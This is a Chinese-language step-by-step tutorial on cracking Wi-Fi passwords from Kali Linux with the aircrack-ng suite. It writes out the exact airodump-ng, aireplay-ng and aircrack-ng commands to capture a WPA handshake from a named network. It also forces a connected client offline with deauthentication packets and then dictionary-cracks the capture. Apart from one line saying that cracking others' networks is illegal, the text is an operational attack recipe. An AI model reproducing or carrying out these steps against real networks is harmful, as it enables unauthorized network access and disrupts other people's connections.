kali破解wifi密码

开始

1. 选择合适的网卡，确保Kali能够正确识别。我使用的是以下网卡信息。

2. 开启网卡的监听模式。

3. 确认监听模式是否成功开启（如果网卡名称变成"wlan0mon"，说明成功）。

4. 输入命令"airodump-ng wlan0mon"，扫描附近的热点信息。找到想要破解的热点名称后，按下Ctrl+C停止扫描（这里以"NEM-AL10"作为示例，但请注意破解他人无线密码是违法的，仅作为演示）。

5. 抓取握手包。命令格式为"airodump-ng -c {CH} --bssid {BSSID} -w {保存握手包的目录}"。输入命令"airodump-ng -c 11 --bssid 3C:FA:43:7E:57:48 -w /home/ wlan0mon"。当成功抓到握手包时，箭头处会显示"handshake"字样。

6. 目前还无法抓到握手包，因为没有客户端与接入点（AP）连接。但我们可以看到已经有一个热点处于连接状态。我们可以发送反认证包，将其强制下线，然后客户端会尝试重新连接热点，这样我们就能抓到握手包了。在新的终端窗口中，输入命令"aireplay-ng -0 {发送反认证包的个数} -a {BSSID} -c {强制下线的MAC地址（STATION下面的地址）} 无线网卡名称"。例如，输入"aireplay-ng -0 10 -a 3C:FA:43:7E:57:48 -c 30:10:B3:DC:9F:75 wlan0mon"。系统会将客户端强制下线，然后重新连接，这样我们就能抓到握手包了。

7. 按下Ctrl+C停止抓包。在"/home"目录下查看握手包，其中"-01.cap"是我们接下来破解所需的数据包。

8. 使用aircrack-ng进行破解。命令格式为"aircrack-ng -w {本地的字典文件（破解的关键）} {握手包}"。例如，输入"aircrack-ng -w top3000.txt /home/-01.cap"。由于握手包的命名特殊性，这里只能使用绝对路径，如果更改文件名，就可以使用相对路径了。

字典文件可以在网上找到很多，这里提供一个在GitHub上的示例。

结语：

破解的原理是逐个尝试密码。抓取握手包的原因是因为握手包中包含经过加密的密码。我们将握手包抓取下来后，可以在本地使用字典文件进行破解。每秒钟可以尝试几万个密码，而如果没有握手包，我们只能手动输入密码，速度会很慢。即使使用程序进行尝试，也不能保证路由器没有设置错误次数，有可能会禁止连接。另外，每次与路由器交互所需的时间也大于一秒。